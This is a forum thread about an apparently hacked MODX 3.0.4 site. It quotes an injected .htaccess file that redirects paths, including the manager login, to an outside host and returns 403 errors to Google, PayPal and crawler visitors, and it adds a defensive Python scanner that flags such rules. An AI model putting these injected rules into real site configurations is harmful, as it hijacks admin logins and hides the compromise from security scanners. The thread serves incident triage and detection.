MODX 3.0.4 .htaccess Hack?

Today I found a security problem on a MODX 3.0.4 installation. The .htaccess file had been changed in this way:

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d

RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^(.+)/(.+)/?$ https://p.metodologie.it/session/ [NC,QSA,L]
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} google\.com [NC,OR]
RewriteCond %{HTTP_REFERER} google\.com
RewriteCond %{HTTP_REFERER} paypal\.com
RewriteCond %{HTTP_REFERER} firefox\.com
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
RewriteCond %{HTTP_USER_AGENT} ^googlebot [OR]
...
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^.* - [F,L]
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?http://safebrowsing-cache.google.com/.*$ [NC]
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F,L]
############################
#Anti ZS spyeyes Tracker .htaccess #
#84.74.14?.*               #
############################
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http://.*google\.com [NC]
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
###########################################
#Spider Blocker/Crawler/Bot's             #
###########################################
Order Deny,Allow
Deny from 82.165.47.*
...
Deny from 212.12.114.*
Deny from 213.160.90.*
Deny from *.abuse.ch
Deny from *.google.com

I was not allowed to update the installation because the client was doing it on its own. I don’t find any security problems in the MODX version 3.0.4 in use or in the installed extras.

So I think the change/hack comes from another application on the shared hosting and is not MODX-related. Has anyone discovered a similar problem in MODX? At first glance, only the .htaccess is changed.
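As a triage aid for a file like the one above, here is a small scanner (an added example; it is not code from this thread, from MODX or from cPanel). It pairs each RewriteRule with the RewriteConds that precede it and flags the three things that stand out in the pasted file: a rewrite whose target is an external host (the p.metodologie.it redirect), a 403 response that depends on the Referer or User-Agent (hiding the site from Google, PayPal and security scanners), and IP/host-based Deny rules. The `TRUSTED_HOSTS` set is an assumption for the example, and the embedded sample is a constructed excerpt of the file above with the repeated .well-known exclusions left out.

```python
"""Triage scanner for a tampered Apache .htaccess (added example, not MODX code).

Pairs every RewriteRule with the RewriteConds in front of it and reports:
  external_redirect - target URL points at a host outside TRUSTED_HOSTS
  cloaking          - a [F] (403) rule gated on HTTP_REFERER / HTTP_USER_AGENT
  deny_from         - IP/host blocks added with 'Deny from'
"""
import re
import sys
from dataclasses import dataclass
from urllib.parse import urlparse

# Assumption for this example: the site's own hostnames; redirects elsewhere are flagged.
TRUSTED_HOSTS = {"example.com", "www.example.com"}


@dataclass
class Finding:
    line_no: int
    kind: str      # external_redirect | cloaking | deny_from
    detail: str


def _flags(token):
    """Parse a trailing '[NC,QSA,L]' or '[R=301,L]' token into a set of flag names."""
    m = re.fullmatch(r"\[(.*)\]", token)
    if not m:
        return set()
    return {f.strip().split("=")[0].upper() for f in m.group(1).split(",")}


def scan_htaccess(text, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of Finding objects for the suspicious directives in `text`."""
    findings = []
    pending = []  # (line_no, variable, pattern) of RewriteConds awaiting their RewriteRule
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Plain whitespace split is enough for triage. An escaped space inside a
        # regex (e.g. '\ Ballot169') gets split, which only affects the text we
        # report for that condition, not how the rule is classified.
        tokens = line.split()
        directive = tokens[0].lower()

        if directive == "rewritecond" and len(tokens) >= 3:
            pending.append((n, tokens[1], tokens[2]))
        elif directive == "rewriterule" and len(tokens) >= 3:
            pattern, target = tokens[1], tokens[2]
            flags = _flags(tokens[3]) if len(tokens) > 3 else set()
            if target.startswith(("http://", "https://")):
                host = (urlparse(target).hostname or "").lower()
                if host not in trusted_hosts:
                    findings.append(Finding(n, "external_redirect", f"{pattern} -> {target}"))
            if "F" in flags:
                gated = [f"{var} {pat}" for _, var, pat in pending
                         if "HTTP_REFERER" in var.upper() or "HTTP_USER_AGENT" in var.upper()]
                if gated:
                    findings.append(Finding(n, "cloaking", "403 when " + " | ".join(gated)))
            pending = []  # RewriteConds only apply to the next RewriteRule
        elif directive == "deny" and len(tokens) >= 3 and tokens[1].lower() == "from":
            findings.append(Finding(n, "deny_from", tokens[2]))
    return findings


def report(text, trusted_hosts=TRUSTED_HOSTS):
    """One human-readable line per finding, for pasting into a ticket."""
    return [f"line {f.line_no}: {f.kind}: {f.detail}" for f in scan_htaccess(text, trusted_hosts)]


# Constructed excerpt of the tampered file from the thread; the repeated
# .well-known exclusions (cPanel's domain-validation rules) are omitted.
SAMPLE_HTACCESS = r"""
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.+)/(.+)/?$ https://p.metodologie.it/session/ [NC,QSA,L]
RewriteCond %{HTTP_REFERER} google\.com [NC,OR]
RewriteCond %{HTTP_REFERER} paypal\.com
RewriteRule .* - [F]
RewriteCond %{HTTP_USER_AGENT} ^googlebot [OR]
RewriteRule ^.* - [F,L]
Order Deny,Allow
Deny from 82.165.47.*
Deny from *.abuse.ch
""".lstrip("\n")


if __name__ == "__main__":
    # Usage: python scan_htaccess.py [/path/to/.htaccess]; with no argument the sample is scanned.
    source = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_HTACCESS
    for line in report(source):
        print(line)
```

The .well-known exclusions are deliberately not reported: they are the shape cPanel adds for certificate validation, and a RewriteCond on REQUEST_URI is not what makes this file hostile. What makes it hostile is the combination the scanner does report, a friendly-URL-shaped rule that sends two-segment paths (which is what /manager/ logins look like) to a third-party host, plus 403 rules that only fire for visitors arriving from Google or PayPal or identifying as Googlebot, so that the people most likely to notice the redirect never see it.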

Some of the rules come from cPanel. What exactly do you see as suspicious?

Thanks, it’s not my .htaccess file anymore, and the manager login is getting redirected. The client has logged no action that would indicate he made any changes. And I don’t think Strato made these changes. Hmm, I will keep an eye on this.